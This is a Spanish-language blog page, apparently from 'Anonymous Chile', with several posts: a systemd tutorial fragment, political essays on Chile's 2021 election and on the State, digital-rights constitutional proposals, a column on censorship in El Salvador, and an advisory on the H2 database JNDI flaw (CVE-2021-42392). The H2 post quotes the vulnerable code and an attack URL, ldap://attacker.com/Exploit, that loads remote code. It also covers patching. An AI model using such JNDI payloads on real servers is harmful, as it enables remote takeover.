  • sudo systemctl daemon-reload: esta orden nos permite recargar todos los servicios de nuevo, muy útil por si modificamos varios de ellos, de esta forma, podremos hacerlo de forma global con todos.
  • sudo systemctl stop ttrssupdate.service: este comando nos permite detener el servicio anteriormente iniciado, al detener el servicio podríamos hacer cambios que arrancado no se podrían hacer, por ejemplo, también para aplicar cambios tendremos que parar e iniciar el servicio.
  • sudo systemctl restart ttrssupdate.service: nos permite reiniciar el servicio (es lo mismo que pararlo y arrancarlo, pero en un solo comando).
  • journalctl -u ttrssupdate.service: nos permite ver el registro generado por el servicio en cuestión, por si hay algún error a la hora de ejecutarlo, o algún aviso que podría dar lugar a futuros problemas.
  • sudo systemctl status ttrssupdate.service: nos permite ver la información de estado sobre el servicio en cuestión, este comando es fundamental para ver si está en funcionamiento o no.

Fuentes:

Redes Zone: Aprende a crear tus propios servicios en Linux usando Systemd
Linux Adictos: Gestionar servicios en tu distribución GNU/Linux

3 comentarios

La alegría nunca llegó y el miedo se disfraza de esperanza

Publicada el 18/02/2022 - 17/02/2022 por Anonymous Chile

El pasado 19 de diciembre pasó a la historia y no por pocas razones. Aquella jornada el nuevo presidente electo, la joven ex figura de la burocracia estudiantil, Gabriel Boric, se impuso en el balotaje con una gran diferencia sobre su contrincante José Antonio Kast, un anticomunista y pinochetista recalcitrante que había logrado apoderarse de la primera mayoría en la primera vuelta, y con ello de la representación de la derecha y su pacto “Chile Podemos Más”.

Este logro electoral fue celebrado, en ese sentido, por fervientes demócratas e izquierdistas “críticos” como una verdadera victoria popular, como un triunfo aplastante frente al “fascismo” y como la continuidad de un proceso que desde el estallido de la revuelta en adelante, con Convención Constitucional incluida, viene abriendo el camino para la “dignidad del pueblo chileno”; una actitud que contrasta mucho con la demostrada un mes antes, cuando con pavor estos mism@s demócratas e izquierdistas veían como esta figura del “fascismo” lograba obtener la primera mayoría: una lluvia de lamentos, insultos, memes, amenazas con irse del país y todo lo que el imaginario de izquierda lleva consigo junto al miedo se sumó a las repetidas increpaciones al “pueblo ignorante” y a l@s “fascistas de izquierda”, que gracias a su abstención permitieron —supuestamente— aquel resultado.

Y le agregamos “supuestamente”, pues la reacción frente a este primer resultado fue la que le permitió a Boric su “aplastante” triunfo electoral en segunda vuelta. En efecto, una vez pasada esta primera vuelta, Boric y Kast no dejaron de moverse hacia el centro como naturalmente buscaría cualquier candidato; Boric apelando a la vieja Concertación, cortejando sobre todo a la Democracia Cristiana, con los apoyos explícitos de Lagos y Bachelet, mientras que por su lado Kast se enfocaba en la cuestión de la mujer, desprendiéndose de los elementos reaccionarios extremos que aún generaban anticuerpos en su electorado. Ambos, obviamente, concentrando su discurso en la estabilidad y el orden. Este lobby político junto al uso de la famosa calculadora fue el que mantenía a Boric liderando en las encuestas por un pequeño margen, manteniendo la incertidumbre acerca de la eventual participación de quienes histórica y mayoritariamente se han restado de estos procesos eleccionarios. No hay encuesta MORI para medir esto, pero efectivamente tras la primera vuelta que ponía a Kast en la delantera, y a contra corriente del “giro” hacia el centro de su candidato —que en verdad es la continuidad de la política institucional y policial que siempre ha defendido—, un tedioso vendaval desde la mayor parte de la izquierda se desató en las redes sociales, algunos espacios sociales y calles, con su campaña de apoyo “crítico”: comunidades LGTBIQ+ y feministas institucionales, izquierdistas trasnochados y antifascistas de conciertos, comenzaron la verdadera campaña “contra el nazi” que le dio el triunfo a Boric, un candidato al que nadie quería y famoso por su rol reaccionario, pero que fue capaz de movilizar a sus propi@s adversari@s en base a la caricatura del fascismo —incluso sin tener que mencionarlo—. Boric, sin ningún pelo de tonto, selló con un broche de oro su triunfo en una jornada multitudinaria con la frase “ganó la esperanza sobre el miedo” (cuando en realidad fue el miedo a la ultraderecha pinochetista la que lo hizo ganar, no alguna esperanza general en su ya mediocre programa de gobierno), a sabiendas que su elección cerraba un ciclo y con él se intenta enterrar toda proyección revolucionaria de la experiencia de octubre, o por lo menos, aplazarla lo suficiente por un buen periodo de tiempo.

Por otro lado, y también a contra corriente del pensamiento popular, no fue su “fascismo” lo que le impidió captar más votos a Kast, sino todo lo contrario: la falta de él. En primer lugar, el discurso de Kast no contó para nada con elementos revolucionarios y populares propios del fascismo histórico que pudieran enganchar con algún sector indeciso del proletariado —al cual necesita ganarse para imponerse democráticamente—, y en segundo lugar, no logró trascender el esquema político tradicional aferrándose a su pinochetismo clásico con un carácter claramente burgués, lo que al igual que en las elecciones del Apruebo/Rechazo se reflejó bien, por ejemplo, en el mapa del voto en las comunas del gran Santiago. Esto, al parecer, lo ha sabido leer bien el ex candidato, el cual inaugura una nueva etapa dentro del Partido Republicano el primer día del 2022, presentando públicamente su renuncia a la presidencia del partido, tomando la dirección de su ala social Acción Republicana y llamando a disputar las “muchas zonas y territorios de nuestro país donde la izquierda tiene un predominio y donde por años, nos hemos marginado de ejercer la acción social y política de nuestras ideas”, afirmando de paso que “el debate en Chile sigue centrado en los problemas de la elite y los grupos de presión, alejado de la realidad que día a día golpea a millones de chilenos”.

Sin duda alguna, estas últimas elecciones terminaron conmocionando a todo el país y la artificial y publicitada polarización de la que tanto hablaron los periodistas terminó por movilizar a casi 1.300.000 personas más a las urnas: el voto “antifa” y “antiKast”, de proletari@s que no suelen votar, fue fundamental para que Boric venciera, más que un voto a favor de su programa. En los tiempos de la volatilidad política se pasó de un mes a otro, de una marcada abstención —votó en primera vuelta el 47.33% del padrón electoral— a una participación histórica —55.65% del padrón—, todo esto en medio de debates televisados y ampliamente difundidos, declaraciones, polémicas, funas y des-funas. Basta recordar como Boric, repudiado con justa razón desde su época como burócrata estudiantil en donde asumió un rol desmovilizador en los momentos clave del 2011, pasando por su participación insigne en la firma del repudiado “Acuerdo por la Paz Social y la Nueva Constitución”, y su recordado apoyo al paquete de leyes represivas implementadas en plena revuelta —Ley anti saqueos y anti barricadas—, golpeado, escupido y bañado en cerveza rancia, le ganó a un Daniel Jadue que, adulado por grandes sectores de la izquierda, venía desde hace años preparándose como una de las grandes promesas de la política pre y post revuelta. De esta misma forma, un Kast con capacidad de voto marginal, representante de una ultraderecha que se daba por muerta a no ser de por un par de ex boneheads y viejos pinochetistas sin influencia alguna, logró ganarle al candidato de un oficialismo con aires de renovación (Sebastián Sichel); o un Franco Parisi y el Partido de la Gente, que con su candidatura virtual captó gran parte del electorado y fue también relevante en el resultado final de la competencia al cargo presidencial.

Efectivamente, las últimas elecciones fueron un gran negocio para l@s analistas y periodistas polític@s, y de hecho afloró también en la población misma, todo un espíritu republicano con viej@s militantes y “opinólog@s” de política, expert@s en estadísticas y, sobre todo, usuari@s pretendidamente hábiles en los cálculos políticos a la hora de escoger “el mal menor”. Toda esta ensalada que se presenta ahora como los síntomas de un sistema político en recuperación, como los sanos gestos de un país que vuelve a dialogar, solo expresan en resumen la bancarrota total de la política que desde hace varios años debe recurrir más a figuras televisivas que a polític@s profesionales, y que por ende se encuentra aún más a merced de los criterios del capital mundial; expresa la recta final de un aparato gubernamental con cada vez menos injerencia y más supeditado a los consejos de tecnócratas y asesor@s fieles a los índices macro económicos. Es la crisis en actos.

Como es bien sabido, el Covid-19 solo ha acelerado un proceso de restructuración capitalista frente a una crisis de valor y ecológica sin precedentes, con las consecuencias nefastas que recaen sobre nuestra clase y la Tierra. La crisis de valorización del capital –disminución tendencial de la tasa de ganancia capitalista por la sustitución del trabajo humano provocada por la automatización de los procesos productivos– se ha manifestado en tiempos de pandemia de diversas maneras: migraciones masivas, crisis logística en los puertos y en las cadenas de suministro, escasez de suministros tecnológicos, aumento del costo del transporte marítimo, subida de los precios de alimentos, combustibles y materias primas. Con respecto al aumento de los precios, el Banco Mundial indica que ha sido la recesión con el incremento inflacionario más rápido de los últimos 50 años: el aumento de los precios de los combustibles y de las materias primas, ha repercutido directamente en un aumento de los precios de otras mercancías, y de esta forma, a través de precios inflados, se encubre la disminución real del valor –que representa el tiempo de trabajo socialmente necesario, en constante disminución desde la tercera revolución tecnológica– a la vez que se sigue asegurando una rentabilidad para la clase capitalista en términos de ganancia y renta de la tierra.

En la región dominada por el Estado chileno la inflación se ubicó a fines del 2021 cerca del 7%, lo que implica un marcado aumento del costo de la vida que no escapa a la dinámica mundial y su potencial agravamiento frente a un proceso de recesión más duradero. Sin embargo, esta región presenta una “caja chica” aún solvente y una deuda pública baja, lo que le entrega una mejor situación para hacer frente a la crisis del capital con respecto a otros países de la región latinoamericana. Además Chile, por su posición geográfica, es fundamental para el capital mundial como puerta de entrada de mercancías a través de sus puertos en el Pacífico, y los Tratados de Libre Comercio firmados, como también por los capitales internacionales y nacionales instalados en el territorio, que poseen un marcado carácter extractivista y son altamente contaminantes –megaminería, forestales, agricultura de exportación y salmoneras–, por lo que no deja de ser una buena fuente de negocios para la clase capitalista, mientras generan mayores desastres ecológicos y “zonas de sacrificio”. La destrucción ecológica de suelos, la sequía permanente, y los cambios a nivel climáticos que hemos observados durante la última década han disminuido la productividad de las tierras locales presionando a un alza de los precios de los alimentos: todos ellos son síntomas que indican el carácter demencial del modo de producción capitalista. Por otra parte, la región chilena ha presentado durante el último año una depreciación de la moneda nacional sin precedentes, llegando el precio del dólar a los $872 durante el triunfo de Boric, lo cual haría aún más complejo el escenario inflacionario debido a la fuerte dependencia de esta región al capital internacional, y que recae por completo en la capacidad de nuestra clase de acceder a los medios de subsistencia para nuestra reproducción.

La fase actual de descomposición del capital hace incierto el panorama futuro, una reestructuración sin conflictos es imposible, y como sabemos todo el peso de la crisis recaerá sobre nosotr@s, por saludable que sea la economía chilena hoy, y por ingenuas que sean las aspiraciones de mejorar el capitalismo, el peso de las tendencias destructivas del modo de (re)producción capitalista se impondrán de forma violenta.

Ante la expectación e ilusión de una parte de votantes que ven en Boric un cambio en la forma de hacer política, una verdadera inoculación a un sistema en profunda crisis y muy recientemente cuestionado que busca extender su vida de manera desesperada, es lógico preguntarnos qué es realmente lo que podemos esperar del próximo gobierno y, en contrapartida, qué respuesta se puede visualizar de los grupos de izquierda frente al posible futuro escenario.

Como elementos de vital urgencia, se nos presentan dos aspectos fundamentales que constituyen el foco más amplio de interés, expectativa y controversia. Estos son, por un lado, la prisión política y el desarrollo de la guerra social en el Wallmapu, cuyo carácter humano lo transforma en la más amplia contradicción de los principios originales que alguna vez proclamó encarnar el proyecto hoy electo, y, por otra, la galopante inflación que amenaza las bases materiales de cualquier gobierno y que no es otra cosa que un síntoma de la profunda crisis que atraviesa el capital global.

En cuanto a lo primero, se hace fundamental recordar a la propia concentración que se volcó a las calles el domingo 19 de diciembre que vociferó la imperante necesidad de la liberación de l@s pres@s polític@s, específicamente l@s de la revuelta, que cuentan con mayor respaldo social en sus demandas, llamamiento que durante varios días fue enfrentado con evasivas por el presidente electo y que junto con el avance de la lucha mapuche autónoma en el Wallmapu, que en los últimos meses ha significado un recrudecimiento de las medidas represivas, han suscitado el más polémico viraje de los principales ejes del discurso del otrora candidato desde la primera a la segunda vuelta, que en el interés de salvaguardar la democracia lo han encaminado a develar en su proclama el resguardo del orden público y el camino de la paz como el horizonte del siguiente gobierno, situación que ha tenido como consecuencia incluso las refutaciones con destacados miembros de su coalición, como son Jackson y Siches, que han llegado tarde al desnudamiento de los verdaderos principios que mueve a la política en la democracia.

Por otro lado, pero no menos importante, la creciente inflación y la desaceleración del crecimiento ha llevado al Banco Central a advertir el grave problema de las excesivas expectativas que se enfrentan, aconsejando “moderación fiscal” ante la alerta amarilla de la economía e invitando a reducir la incertidumbre dando confianza al mercado con estabilidad social y política, tornando altamente improbable que existan reformas o contrarreformas significativas. Muy por el contrario, se hace esperable que se perpetúe un Estado subsidiario de carácter focalizado que pueda entregar medidas conciliadoras que no lograrán satisfacer las promesas de estatización de los servicios básicos y derogación de las leyes represivas que formaron parte del entramado de respuestas que buscaron explicar el descontento que vio nacer y resultó de octubre 2019. Lo que, sin ir muy lejos, queda de manifiesto en el cambio que se ha dado al anhelado fin de las AFP –que junto con la educación, salud y vivienda han sido las demandas históricas de los movimientos sociales locales– y que ha sido postergado a un plazo de cuarenta años hacia el futuro según el equipo de Boric.

Es indudable que, ante un eventual escenario de masiva decepción provocada por el sistemático abandono de los principales ejes de campaña que heredó Boric de su experiencia en los movimientos sociales que ignora su propia naturaleza inviable en el marco capitalista, se buscará apoyo en la izquierda y probablemente la convocatoria a la moderación, la unidad y el respaldo a un programa que traiciona sus propias raíces muertas invocará a la desmovilización ante una cada vez mayor amenaza de una derecha alimentada del desencanto, lo que hace posible prever el resurgimiento de los llamados a respaldar y proteger al gobierno y, junto con esto, el aislamiento y la criminalización de quienes rechacen este camino por “hacerle el juego a la derecha”, por amenazar el orden público y la paz, que se perpetúan como las directrices de esta ficción de nuevo proyecto de país.

Desde luego, Chile no es una excepción en esta dinámica de contención institucional que le sigue a una profunda ruptura de la continuidad capitalista producida por una intensa agitación social. Además de la brutal represión estatal, la política de cooptación suele acompañarse con el aprovechamiento electoral del descontento generalizado por parte del progresismo y la centroizquierda, siempre en defensa del orden.

Esta es una constante histórica, pero baste recordar lo que ha ocurrido recientemente en Grecia y España, países que han visto el ascenso al poder de distintas fracciones de la socialdemocracia, para refrescar la memoria.

Grecia, a fines de la primera década de este siglo, experimentó grandes movilizaciones sociales. En diciembre de 2008, luego del asesinato del adolescente de 15 años Alexandros Grigoropoulos en Atenas a manos de la policía, se desata una revuelta que encuentra su fermento en la grave situación económica y política del país. A partir de ahí la tensión es constante, y a fines del 2009 estalla la conocida como “crisis de la deuda soberana en Grecia” o “depresión griega”. Organismos del capital y la Unión Europea exigen la implementación de medidas de austeridad, atacando directamente las condiciones de vida del proletariado, el que resiste tenazmente estas políticas. Particularmente, en mayo de 2011 surge el “Movimiento de las Plazas”, en sintonía con la aparición de movilizaciones similares por toda Europa, Medio Oriente y otras regiones del mundo (EEU.U., por ejemplo), ocupando las plazas centrales de las ciudades, y centrado en este caso en el rechazo a la implementación de estas medidas de precarización de la vida. En 2015, una coalición de organizaciones de izquierda formada en 2004, que agrupaba a grupos trotskistas, maoístas, escisiones del Partido Comunista Griego (KKE) y otras variedades de izquierdismo, denominada Coalición de Izquierda Radical (SYRIZA), logra hacerse del gobierno a través de las urnas —la coalición pasa a conformarse como partido político ante estas elecciones, para optar a los premios electorales que el sistema griego otorga al partido más votado—, marcando un hito en la historia política del país, siendo Alexis Tsipras nombrado primer ministro. Llega al poder prometiendo la cancelación de la deuda pública y la abolición de los programas de austeridad, bajo el discurso de la no subordinación nacional a las medidas impuestas por la UE (a través de la Comisión Europea), el Banco Central Europeo (BCE) y el Fondo Monetario Internacional (FMI) a cambio del “rescate económico” del país. Sin embargo, SYRIZA no logra mayoría absoluta en el parlamento, por lo que forma alianza con el partido de derecha nacionalista y populista ANEL (lo que causa una primera decepción con el reciente gobierno). Posteriormente, en las negociaciones por las medidas de austeridad, el mismo gobierno promovió un referéndum para decidir si se aceptaban o no las condiciones impuestas al país —al proletariado griego, en realidad— para el rescate económico, ganando el rechazo a estas medidas por un amplio margen (con un 61.31%). Sin embargo, se desentendió a los pocos días del resultado y terminó sometiéndose a las exigencias de la troika, que fueron incluso más duras que las que se habían considerado cuando se llamó al referéndum. Finalmente, fue a través de este gobierno izquierdista —por su conformación, situado más a la izquierda que el actual bloque FA-P”C” y sus amistades exconcertacionistas— que las medidas de austeridad impuestas contra el pueblo griego por el capital, y que habían sido férreamente combatidas durante años en las calles, pudieron seguir implementándose, allanando el camino para que hoy sea nuevamente la derecha (Nueva Democracia) la que se encuentre instalada en el gobierno.

En España, con sus particularidades, se vive un proceso que sigue una lógica similar. El movimiento de ocupación de las plazas tiene como referencia precisamente al movimiento de “los indignados” españoles o 15M, que también en mayo de 2011 explotara en el país ibérico. Si bien el contenido de dicho movimiento se encuentra desde un inicio supeditado a un ciudadanismo que exigía “más y mejor democracia”, algunas de sus experiencias van más allá en el cuestionamiento del orden social capitalista. Surge de un rechazo a un sistema político deslegitimado y que se aprecia como agotado, y a una creciente precarización de la vida, que se observa en el progresivo desmantelamiento de políticas de seguridad social a partir de la crisis mundial del 2008 y a la implementación de medidas privatizadoras de corte neoliberal. Este descontento lo intenta canalizar el partido político PODEMOS, que pretende abandonar el eje izquierda-derecha y abrazar aquel que supone como contrarios a la democracia y la dictadura. PODEMOS surge con el discurso de defender y promover una verdadera democracia. Se formó el 2014 y en poco tiempo logró cosechar varias victorias electorales, y desde el 2020 forma parte del gobierno español gracias a un acuerdo con el PSOE —partido tradicional del bipartidismo que era uno de los blancos de las protestas del movimiento 15M—. En esta posición, por ejemplo, han implementado fundamentalmente las mismas políticas frente a la pandemia de coronavirus que casi todos los países, es decir, salvaguardando los intereses de la clase capitalista frente a la vida de las personas, y se han destacado hace unas semanas por ser responsables de la brutal represión a la huelga de los obreros del metal en Cádiz, dulcificada por las declaraciones de algunos de sus portavoces. Y es que, como es lógico, los gobiernos solo pueden defender los intereses del capital, y harán todo lo que tengan a mano para cumplir con tal fin.

La izquierda del capital funciona como agente desarticulador cuando llega a las esferas de poder. Incluso sin quererlo —ni comprenderlo— forman parte de una estructura que no está hecha para defender al proletariado, una estructura que tiene su función en garantizar la supervivencia a largo plazo de las relaciones de explotación. La izquierda se comporta como un medio eficiente para implementar medidas a favor de la acumulación capitalista que encontrarían mayor resistencia si fueran promovidas por otros gobiernos, y reprime tan brutalmente como le sea necesario: en la región chilena, con la llegada de Boric y “Apruebo Dignidad” al control del Estado, no tiene por qué ser diferente.

76 comentarios

RCE sin autenticación en H2 por JNDI

Publicada el 17/02/2022 por Anonymous Chile

Recientemente los investigadores de JFrog han alertado que la consola de H2, la popular base de datos Java SQL de código abierto que almacena datos directamente en memoria, es vulnerable a ejecución remota de código. ¿Cómo? Pues mediante carga remota de clases con JNDI, algo que se introdujo en la BlackHat USA de 2016 por Alvaro Muñoz y Oleksandr Mirosh (Whitepaper) y que se hizo sobradamente conocido por la vulnerabilidad log4shell.

Y de forma similar a lo que pasó con la mencionada en disputa, lo de H2 ahora bautizado como (CVE-2021-42392) ya fue reportado/introducido en su momento (también en el repo de vulhub) por otro investigador, en este caso por el hongkonés pyn3rd en abril de 2020.

Básicamente, en H2 el método org.h2.util.JdbcUtils.getConnection toma un nombre de clase de driver y una URL de base de datos como parámetros. Si la clase del controlador se puede asignar a la clase javax.naming.Context, el método crea una instancia de un objeto y llama a su método de búsqueda:

else if (javax.naming.Context.class.isAssignableFrom(d)) {
    // JNDI context
    Context context = (Context) d.getDeclaredConstructor().newInstance();
    DataSource ds = (DataSource) context.lookup(url);
    if (StringUtils.isNullOrEmpty(user) && StringUtils.isNullOrEmpty(password)) {
        return ds.getConnection();
    }
    return ds.getConnection(user, password);
}

Y como hemos apreciado anteriormente, proporcionando una clase de controlador como javax.naming.InitialContext y una URL como ldap://attacker.com/Exploit (o rmi, corba…) conducirá a la ejecución remota del código.

¿Cómo podemos defendernos?

Si estás a cargo de una base de datos H2 lo mejor que podrías hacer es actualizar lo antes posible a la versión 2.0.206, incluso aunque no tengas expuesta la consola. Esa versión nos protege contra CVE-2021-42392 limitando las URLs de JNDI para usar solo el protocolo java (local), que deniega cualquier consulta LDAP/RMI remota. Esto es similar a la corrección aplicada en Log4j 2.17.0.

Por otro lado, las últimas versiones de Java ya la mitigan con trustURLCodebase. aunque se puede evadir enviando un objeto Java «gadget» serializado a través de LDAP, siempre que la clase «gadget» respectiva esté incluida en la ruta de clase (depende del servidor que ejecuta la base de datos H2). Por eso, en todos los casos lo mejor es actualizar.

2 comentarios

Propuestas constitucionales para Chile en la era de la información

Publicada el 21/01/2022 - 21/01/2022 por Anonymous Chile

A causa del estallido social iniciado el 18 de Octubre del año 2019, y combinado con un largo proceso político, social y cultural que ayudó a determinar las directrices para el futuro de Chile, se han generado múltiples cambios, revoluciones, proyectos, movimientos y nuevas ideas simultáneas que, entre otras cosas, destacaron por impulsar la escritura y el desarrollo de una nueva Constitución para el pueblo de Chile que tendría por objetivo establecer la defensa por los derechos humanos, la preservación y defensa de la naturaleza, los animales, pueblos originarios, flora y fauna, justicia contra los delitos cometidos por las élites más altas y poderosas de la sociedad chilena, sueldos dignos para los trabajadores y ayudas para personas de escasos recursos o con condiciones especiales que les impidan trabajar cómoda y apropiadamente.

Con este motivo en mente, desde la página web Era de la Información diversas agrupaciones y comunidades de filosofos, artistas, ingenieros, programadores, profesores, escritores, defensores de derechos humanos y activistas por las libertades digitales están invitando, llamando y convocando públicamente a la ciudadanía a votar por un conjunto de iniciativas populares de norma para proponerse a evaluación en la Convención Constituyente que en estos momentos se encuentra redactando la futura carta magna que regirá a partir del presente año en adelante.

Las mencionadas normativas pretenden garantizar el derecho a la privacidad, al conocimiento, la soberanía digital y uso de software libre tanto en el gobierno como en las dependencias del estado, difundiendo así la filosofía de la cultura libre en todo el país que establezca un respeto por la vida íntima, un manejo controlado y limitado de nuestros datos personales, un acceso soberano a los sistemas informáticos y digitales independizándose de las plataformas privativas y el derecho de acceder, estudiar, modificar, distribuír y compartir todo tipo de materiales, recursos, herramientas y obras intelectuales a fin de promover el conocimiento, la ciencia y la educación. A continuación detallamos las susodichas normativas en disputa acompañadas de una breve descripción y sus enlaces directos para leerse y votarse.

Derecho a la privacidad en internet

Se reconoce y garantiza el derecho a la privacidad – esencial para la protección de la autonomía y dignidad humana – como base para las libertades de consciencia, expresión y asociación.

Descarga la propuesta: privacidad.pdf – english translation

Enlace corto para compartir y apoyar: EraDeLaInformacion.cl/privacidad

Acceso al Conocimiento

Se promueve la igualdad de acceso al conocimiento garantizando el acceso universal a las tecnologías de la información y la liberación del conocimiento generado con los recursos de todos los chilenos.

Descarga la propuesta: acceso.pdf – english translation

Enlace corto para compartir y apoyar: EraDeLaInformacion.cl/acceso

Soberanía tecnológica y digital

Se reconoce y defiende la soberanía nacional en el ciberespacio, garantizando nuestra autonomía ante corporaciones monopólicas, plutocráticas y la intervención extranjera.

Descarga la propuesta: soberania.pdf – english translation

Enlace corto para compartir y apoyar: EraDeLaInformacion.cl/soberania

Software libre, para una formacion cultural informática integral y autónoma

Promueve el uso de software libre en las entidades del Estado.

Enlace corto para compartir y apoyar: EraDeLaInformacion.cl/software-libre

Cuenta Votos Propuesta Constituyente

Además de todo esto, como una forma de ayuda para monitorizar el estado las iniciativas populares de norma, un voluntario ha desarrollado un software en el lenguaje de programación Python que permite seguir y controlar el número de votos recibidos en cada propuesta directamente desde nuestra computadora para así conocer el avance de cada iniciativa o propuesta realizada de una forma cómoda, rápida y expedita.

El mencionado software llamado «Cuenta Votos Propuesta Constituyente»puede encontrarse en su repositorio GIT junto con las correspondientes instrucciones de instalación y manejo de la herramienta.



163 comentarios

Autoritarismo, censura y libertad de expresión en Internet

Publicada el 12/01/2022 - 12/01/2022 por Anonymous Chile

Diversos actores han señalado que El Salvador se dirige progresivamente a un escenario en el que la separación de poderes y la débil democracia desaparece a pasos agigantados.

En febrero de 2020, cuando el presidente Nayib Bukele irrumpió con militares en el Salón Azul de la Asamblea Legislativa para presionar la aprobación de un millonario préstamo, las señales sobre el carácter autoritario del mandatario no han hecho más que incrementarse.

En este camino, el mandatario desobedeció sentencias de la Sala de lo Constitucional y se aseguró de debilitar progresivamente el Instituto de Acceso a la Información Pública (IAIP) hasta tomarlo por completo y volverlo un ente sin incidencia alguna.  Sumado al debilitamiento institucional, hostigó y acosó a periodistas, defensores de derechos humanos y críticos a su gobierno, con complicidad de funcionarios reforzadas por apoyos a través de redes sociales. Estas últimas acciones, que aún continúan, han ocasionado que la Comisión Interamericana de Derechos Humanos (CIDH) ordene al Estado la protección de periodistas del periódico digital El Faro y de la abogada Bertha de León, por considerar que la integridad física de los amparados corre peligro.

Finalmente, en mayo de 2021, la Asamblea Legislativa —de mayoría oficialista— en su primera sesión destituyó ilegalmente a los cinco magistrados de la Sala de lo Constitucional y llenó sus vacantes en contra de los procedimientos establecidos por la Constitución. Igual suerte corrió el Fiscal General.

Para completar el golpe al Órgano Judicial iniciado en mayo, la Asamblea Legislativa aprobó el Decreto Legislativo Nro. 144 que jubila a jueces y magistrados de cámara mayores de 60 años o con 30 años de servicio que representan un tercio de los jueces del país. La decisión fue realizada sin tener competencia de acuerdo a la Constitución, lo que ha sido interpretado como un pretexto para dar a la Corte Suprema de Justicia —hoy tomada por el oficialismo— mayor margen de maniobra para remover jueces y sustituirlos con juzgadores afines.

Paralelo a la remoción de jueces, la Sala de lo Constitucional impuesta por el oficialismo emitió una resolución que autoriza al presidente Bukele a ser relecto en su cargo, a pesar de la prohibición que la misma Constitución establece.

La marcha del 15 de septiembre y la libertad de expresión

En este contexto de eliminación del sistema de pesos y contrapesos, más el descontento generado por la aprobación inconsulta de la ley que obliga al uso del Bitcoin como moneda de curso legal, el actual gobierno enfrentó la primera marcha multitudinaria en su contra, realizada por la sociedad civil el pasado 15 de septiembre.

En el marco de esta protesta, el hashtag #El15marchamos fue posicionado para acompañar los reclamos en el ámbito digital. Paralelamente, algunos usuarios organizaron spaces en Twitter para informar e intercambiar opiniones sobre estos temas relevantes.

En días posteriores a la realización de la marcha, usuarios de Twitter denunciaron la “desaparición” fulminante del #El15marchamos que, hasta unas horas antes y por varios días, había estado como tendencia en la red social. Al mismo tiempo, algunos organizadores de spaces denunciaron que estas sesiones terminaban abruptamente, sin haber sido notificados de las razones por las cuales esto sucedía.

La hipótesis para explicar estos hechos fue que tanto el hashtag como las cuentas organizadoras de los spaces estaban siendo denunciadas por cuentas afines al oficialismo. Dicha hipótesis se alimenta por la confesión del Ministro de Seguridad acerca de la realización de ciber-patrullaje, bajo la excusa del combate a las pandillas, así como por la detención ilegal efectuada por la Policía Nacional Civil contra Mario Gómez, una de las voces más críticas sobre la implementación del Bitcoin en el país.

Si esta hipótesis se confirma, correspondería en un futuro analizar el proceder de Twitter en la aplicación de sus políticas de moderación de contenidos, a la luz de los estándares de protección de derechos humanos, particularmente respecto al derecho a la libertad de expresión.

A pesar de que el objetivo de esta columna no es corroborar tal hipótesis y, en consecuencia, tampoco lo es ahondar en un análisis sobre el apego a los estándares de derechos humanos, si podemos señalar algunas interrogantes que saltan a primera vista. Valdría la pena preguntarnos: ¿la exclusión de contenidos en Twitter se realiza de manera automatizada?, ¿por qué los spaces son cerrados abruptamente sin explicar al usuario la razón por la que se cierra?, ¿la simple denuncia masiva podría inhabilitar un space o hacer desaparecer un hashtag?, ¿por qué desaparecería con facilidad un hashtag que está ligado directamente con la expresión del descontento con el gobierno que la ciudadanía?

En este caso particular resulta cuestionable afirmar que los spaces y #El15marchamos hayan infringido alguna de las reglas comunitarias de Twitter. En sí ninguna de las expresiones puede ser acusada de circular mensajes de odio, fomentar el terrorismo, o de ejercer violencia u acoso. Si alguna cuenta utilizó el hashtag o participó en algún space contrariando las reglas de la plataforma, deberían ser eliminadas únicamente esas interacciones. De lo contrario, se inhabilita parte de la expresión ciudadana en el marco de un reclamo legítimo a sus gobernantes.

Aunque aún no se ha llegado a medidas extremas como el bloqueo de internet en el país, si la hipótesis se confirma, es pertinente señalar la preocupación respecto a que Twitter inhabilite espacios de discusión política en un momento en el cual debería reforzar su protección. En particular, considerando que afortunadamente la marcha del 15 de septiembre se realizó sin ninguna represión por parte de los cuerpos de seguridad, aunque esto puede cambiar, tal como lo advirtió el presidente Bukele en cadena nacional.

161 comentarios

Aspectos económicos y de Estado para entender la Nueva Constitución en Chile

Publicada el 24/10/2021 - 20/10/2021 por Anonymous Chile

El tema Constitución está en la palestra de la discusión diaria, particularmente con la Convención Constitucional y la futura nueva Constitución. Los puntos de vista son diversos como también los temas a tratar. Cuestión importante son los aspectos económicos.

Es imprescindible ver la importancia del Estado en esta temática. Si se recurre al portal Wikipedia, la definición de Estado se expresa como “una organización política constituída por un conjunto de instituciones burocráticas estables, a través de las cuales ejerce el monopolio del uso de la fuerza aplicada a una población dentro de unos límites territoriales establecidos». Aquí es importante acentuar lo señalado respecto al ejercicio del monopolio de la fuerza.

En el libro El Origen de la Familia, la Propiedad Privada y el Estado (1884), Federico Engels expresa:

“La esencia de la sociedad civilizada es el Estado, una maquinaria esencialmente destinada a reprimir a la clase oprimida y explotada, y que en todos los períodos típicos es exclusivamente el Estado de la clase dominante».

En esta definición, hecha hace más de 130 años atrás, también se hace referencia al uso monopólico de la fuerza. A mayor abundamiento, Engels señala:

“Así pues, el Estado no es de ningún modo un poder impuesto desde fuera de la sociedad. Es más bien el producto de un determinado grado de desarrollo de la sociedad, es la confesión de que esa sociedad se ha enredado en una irremediable contradicción consigo misma y está dividida por antagonismos irreconciliables que no puede conjurar”.

Más adelante continúa:

«El Estado se caracteriza en primer lugar por la agrupación de sus súbditos según divisiones territoriales. El segundo rasgo característico es la institución de una “fuerza pública” que ya no es el pueblo armado. Esta fuerza pública especial se hace necesaria porque, desde la división de la sociedad en clases, es imposible una organización armada espontánea de la población”.

Y, a continuación, añade:

“Para sostener en pie esa fuerza pública se necesita la contribución de los ciudadanos: los impuestos …Dueños de la fuerza pública y del derecho a recaudar los impuestos, los funcionarios aparecen ahora como órganos de la sociedad situados por encima de ésta».

Ahora bien, esa definición de organización política de la clase económicamente dominante tiene por objetivo mantener el orden de cosas existente, el status quo y, por ende, aplastar la resistencia de la otra clase, la explotada o dominada, y de las otras capas de la sociedad. Por lo mismo, se puede afirmar que surgió como tal en la transición de la prehistoria a la historia, cuando la sociedad se divide en clases, y la clase explotadora somete a la clase explotada. En ese contexto, se puede nombrar el Estado esclavista, surgido miles de años atrás, donde los señores amos esclavizaron a grupos y capas sociales diversas. Posteriormente podemos señalar, hace algunos siglos atrás, al Estado feudal, donde los señores feudales explotaban a los llamados “siervos de la gleba”, a los campesinos.

